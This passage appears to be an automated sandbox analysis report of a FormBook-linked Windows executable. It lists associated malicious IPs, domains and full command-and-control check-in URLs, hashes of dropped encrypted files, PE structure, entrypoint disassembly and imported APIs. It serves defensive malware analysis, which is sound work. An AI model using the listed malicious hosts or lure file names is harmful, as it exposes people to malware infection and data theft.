                                                                217.160.0.113DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • www.prestigerugz.info/m5si/
                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                • www.prestigerugz.info/m5si/
                                                                r98100.TREN.AUTpdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                • www.lessstressmoreprogress.net/mr04/?Z0D0=rvjNexh3zvI53VZUK60PjrTIX1CVATH5ZgWwVgY6EkaNyaLT3yhdToUFTRj6RAPXbKk9&Xv9xe4=R6Ax
                                                                Purchase_Order.exeGet hashmaliciousFormBookBrowse
                                                                • www.le-riche.fr/i65a/?l6APbZn0=+0bkTaWhYWAVxnCJ2nwVpM/U/2VALoigtFbvSxMYohoxF0aNNQstvpt3f/wi09R94V0cyMZY94rCxAyEavJUVbQqc8cScfvcKQ==&VVcXv=Fzud9r2H_Lzd_B
                                                                Updrag.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • www.le-riche.fr/niku/?7nFlllx=xrumqyiZw2NMGXSTF9hjIkLrOU6nhVxQiFFKzEKgJBV7+VOp5xdEyxF9LjnfDDCimwOB7aDhAwI/GQ5vlF1HZu55hCcgrcQOFQ==&u4=UvZXQxCPphTT6J
                                                                Vldigst.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • www.le-riche.fr/niku/?mPwH=_XpHEd8884gT7RZp&4hiT=xrumqyiZw2NMGXSTF9hjIkLrOU6nhVxQiFFKzEKgJBV7+VOp5xdEyxF9LjnfDDCimwOB7aDhAwI/GQ5vlF1HZu55hCcgrcQOFQ==
                                                                t.exeGet hashmaliciousFormBookBrowse
                                                                • www.le-riche.fr/niku/?xH=WHAh6h1XT&NPUh=xrumqyiZw2NMGXSTXZhmP1v4YE2H3hdQiFFKzEKgJBV7+VOp5xdEyw59LjnfDDCimwOB7aDhAwI/GQ5vlF18Zvll9TNcqcdgEQ==
                                                                23.167.152.41Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • www.06753.photo/4i55/
                                                                DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • www.75178.club/q34f/
                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                • www.75178.club/a4h7/
                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                • www.75178.club/q34f/
                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                • www.75178.club/a4h7/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.ontherise.topDRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 162.0.213.94
                                                                www.prestigerugz.infoDRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.113
                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.113
                                                                all.wjscdn.comDRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 154.90.58.209
                                                                New Order.exeGet hashmaliciousFormBookBrowse
                                                                • 154.90.35.240
                                                                TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                • 38.54.112.227
                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                • 154.205.159.116
                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                • 38.54.112.227
                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                • 154.90.58.209
                                                                www.supernutra01.onlineDRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.220.36
                                                                PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                                • 104.21.24.198
                                                                PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.24.198
                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.24.198
                                                                DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 104.21.24.198
                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.220.36
                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.220.36
                                                                Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.220.36
                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                • 172.67.220.36

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ONEANDONE-ASBrauerstrasse48DEOutstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.132
                                                                PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                • 77.68.64.45
                                                                tmpCA68.HtM.htmGet hashmaliciousUnknownBrowse
                                                                • 82.223.161.12
                                                                la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                • 62.151.165.56
                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 82.223.135.21
                                                                la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                • 74.208.219.57
                                                                https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54Get hashmaliciousPhisherBrowse
                                                                • 82.223.68.99
                                                                ithgreat.docGet hashmaliciousUnknownBrowse
                                                                • 87.106.68.207
                                                                DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.113
                                                                NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.200
                                                                ACPCAJosho.x86.elfGet hashmaliciousUnknownBrowse
                                                                • 162.8.63.18
                                                                hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 162.64.255.255
                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 162.49.96.105
                                                                UToB1WBfv0.exeGet hashmaliciousDarkCloudBrowse
                                                                • 162.55.60.2
                                                                AGrsqxaSjd.exeGet hashmaliciousDarkCloudBrowse
                                                                • 162.55.60.2
                                                                Owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                • 162.1.10.3
                                                                Owari.arm7.elfGet hashmaliciousMiraiBrowse
                                                                • 162.137.25.149
                                                                DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 162.0.213.94
                                                                MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                • 162.0.215.33
                                                                jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 162.52.78.93
                                                                ESVC-ASNUSOutstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                need quotations.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                FSd2UlLC6H.elfGet hashmaliciousUnknownBrowse
                                                                • 23.167.178.53
                                                                1YhXFyiSni.dllGet hashmaliciousWannacryBrowse
                                                                • 23.167.182.84

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\745o5K385

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\tzutil.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                Category:modified
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1215420383712111
                                                                Encrypted:false
                                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\autC19E.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\01152-11-12-24.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):289280
                                                                Entropy (8bit):7.995017874109676
                                                                Encrypted:true
                                                                SSDEEP:6144:/d5+fmQRv2S0X7Kzw5fnpYIWd06r9iRPST8iPLlYb8V9J4ki+:/+YtXEwBqUfRPST8mJs8VHJJ
                                                                MD5:6AD764965EF2E37476698F818C4A80DE
                                                                SHA1:8B7045D468CD4BBA413BAF13DC12F5D2D8A23179
                                                                SHA-256:5CC75DA4A017175340EC2EBBE010DD3F6D7F79E2380E2ADD135298270A9C3849
                                                                SHA-512:1DA5CFD4F03D56DD6F54F96BEBAA3DCE438BC129EB504EE1C61BDBEFC60B8FAD1DA84E6D626A5734489728E3100125B466C173C798E18EBC999B27E3AE49F96E
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...N075KN8P1..KL.POJKMGV.YFJEN375KJ8P1S6KL1POJKMGVTYFJEN375K.8P1]).B1.F.j.F..x.",=.GG$-J1\sU*"_?;j)(g$!7f#+nwxfk'W4T};FF.POJKMGV-XO.x.T..+-.mQ4.Q.u*,.]...z*".)...vX7.._($.0(.KMGVTYFJ..37yJK8..:hKL1POJKM.VVXMKNN3o1KJ8P1S6KL.COJK]GVT)BJENs75[J8P3S6ML1POJKMAVTYFJEN3G1KJ:P1S6KL3P..KMWVTIFJEN#75[J8P1S6[L1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL.$*2?MGV..BJE^375.N8P!S6KL1POJKMGVTYfJE.375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1

                                                                C:\Users\user\AppData\Local\Temp\mousme

                                                                Download File
                                                                Process:C:\Users\user\Desktop\01152-11-12-24.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):289280
                                                                Entropy (8bit):7.995017874109676
                                                                Encrypted:true
                                                                SSDEEP:6144:/d5+fmQRv2S0X7Kzw5fnpYIWd06r9iRPST8iPLlYb8V9J4ki+:/+YtXEwBqUfRPST8mJs8VHJJ
                                                                MD5:6AD764965EF2E37476698F818C4A80DE
                                                                SHA1:8B7045D468CD4BBA413BAF13DC12F5D2D8A23179
                                                                SHA-256:5CC75DA4A017175340EC2EBBE010DD3F6D7F79E2380E2ADD135298270A9C3849
                                                                SHA-512:1DA5CFD4F03D56DD6F54F96BEBAA3DCE438BC129EB504EE1C61BDBEFC60B8FAD1DA84E6D626A5734489728E3100125B466C173C798E18EBC999B27E3AE49F96E
                                                                Malicious:false
                                                                Preview:...N075KN8P1..KL.POJKMGV.YFJEN375KJ8P1S6KL1POJKMGVTYFJEN375K.8P1]).B1.F.j.F..x.",=.GG$-J1\sU*"_?;j)(g$!7f#+nwxfk'W4T};FF.POJKMGV-XO.x.T..+-.mQ4.Q.u*,.]...z*".)...vX7.._($.0(.KMGVTYFJ..37yJK8..:hKL1POJKM.VVXMKNN3o1KJ8P1S6KL.COJK]GVT)BJENs75[J8P3S6ML1POJKMAVTYFJEN3G1KJ:P1S6KL3P..KMWVTIFJEN#75[J8P1S6[L1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL.$*2?MGV..BJE^375.N8P!S6KL1POJKMGVTYfJE.375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1S6KL1POJKMGVTYFJEN375KJ8P1

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.211252733579842
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:01152-11-12-24.exe
                                                                File size:1'229'312 bytes
                                                                MD5:be474451d52ccc6038809f5308effb59
                                                                SHA1:0caf3ee11e31cc873aa5086ae58a8b0b90cf94b3
                                                                SHA256:c277a0bbd4efe9b14a4c880ac91b1ab7d0769ad013e67079bad402f56e260a60
                                                                SHA512:d3a259916401baf76099da3004967993b60b3c3b2eca6985fdfb3537ba178f6300e713f4bc7997f00f17f1c46c06dc4cce41310e3482c311d4d2668dfd3e411d
                                                                SSDEEP:24576:Su6J33O0c+JY5UZ+XC0kGso6Fam0K+8/H33hkDpWY:Uu0c++OCvkGs9Fam0K+8f3WYY
                                                                TLSH:E145CF2273DDC360CB669173BF6AB7016EBF3C214A30B95B1F980D7DA950162162D7A3
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                File Icon

                                                                Icon Hash:aaf3e3e3938382a0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x427dcd
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x675912B7 [Wed Dec 11 04:19:03 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                Entrypoint Preview

                                                                Instruction
                                                                call 00007F5260B57EBAh
                                                                jmp 00007F5260B4AC84h
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push edi
                                                                push esi
                                                                mov esi, dword ptr [esp+10h]
                                                                mov ecx, dword ptr [esp+14h]
                                                                mov edi, dword ptr [esp+0Ch]
                                                                mov eax, ecx
                                                                mov edx, ecx
                                                                add eax, esi
                                                                cmp edi, esi
                                                                jbe 00007F5260B4AE0Ah
                                                                cmp edi, eax
                                                                jc 00007F5260B4B16Eh
                                                                bt dword ptr [004C31FCh], 01h
                                                                jnc 00007F5260B4AE09h
                                                                rep movsb
                                                                jmp 00007F5260B4B11Ch
                                                                cmp ecx, 00000080h
                                                                jc 00007F5260B4AFD4h
                                                                mov eax, edi
                                                                xor eax, esi
                                                                test eax, 0000000Fh
                                                                jne 00007F5260B4AE10h
                                                                bt dword ptr [004BE324h], 01h
                                                                jc 00007F5260B4B2E0h
                                                                bt dword ptr [004C31FCh], 00000000h
                                                                jnc 00007F5260B4AFADh
                                                                test edi, 00000003h
                                                                jne 00007F5260B4AFBEh
                                                                test esi, 00000003h
                                                                jne 00007F5260B4AF9Dh
                                                                bt edi, 02h
                                                                jnc 00007F5260B4AE0Fh
                                                                mov eax, dword ptr [esi]
                                                                sub ecx, 04h
                                                                lea esi, dword ptr [esi+04h]
                                                                mov dword ptr [edi], eax
                                                                lea edi, dword ptr [edi+04h]
                                                                bt edi, 03h
                                                                jnc 00007F5260B4AE13h
                                                                movq xmm1, qword ptr [esi]
                                                                sub ecx, 08h
                                                                lea esi, dword ptr [esi+08h]
                                                                movq qword ptr [edi], xmm1
                                                                lea edi, dword ptr [edi+08h]
                                                                test esi, 00000007h
                                                                je 00007F5260B4AE65h
                                                                bt esi, 03h
                                                                jnc 00007F5260B4AEB8h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ASM] VS2013 build 21005
                                                                • [ C ] VS2013 build 21005
                                                                • [C++] VS2013 build 21005
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ASM] VS2013 UPD4 build 31101
                                                                • [RES] VS2013 build 21005
                                                                • [LNK] VS2013 UPD4 build 31101

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x638a0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x12b0000x711c.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0xc70000x638a00x63a00a203119eec68ec0078c71d9e3e3069d9False0.9334320106649937data7.9074972013379545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x12b0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                RT_RCDATA0xcf7b80x5ab67data1.000325654875807
                                                                RT_GROUP_ICON0x12a3200x76dataEnglishGreat Britain0.6610169491525424
                                                                RT_GROUP_ICON0x12a3980x14dataEnglishGreat Britain1.25
                                                                RT_GROUP_ICON0x12a3ac0x14dataEnglishGreat Britain1.15
                                                                RT_GROUP_ICON0x12a3c00x14dataEnglishGreat Britain1.25
                                                                RT_VERSION0x12a3d40xdcdataEnglishGreat Britain0.6181818181818182
                                                                RT_MANIFEST0x12a4b00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                Imports

                                                                DLLImport
                                                                WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                UxTheme.dllIsThemeActive
                                                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
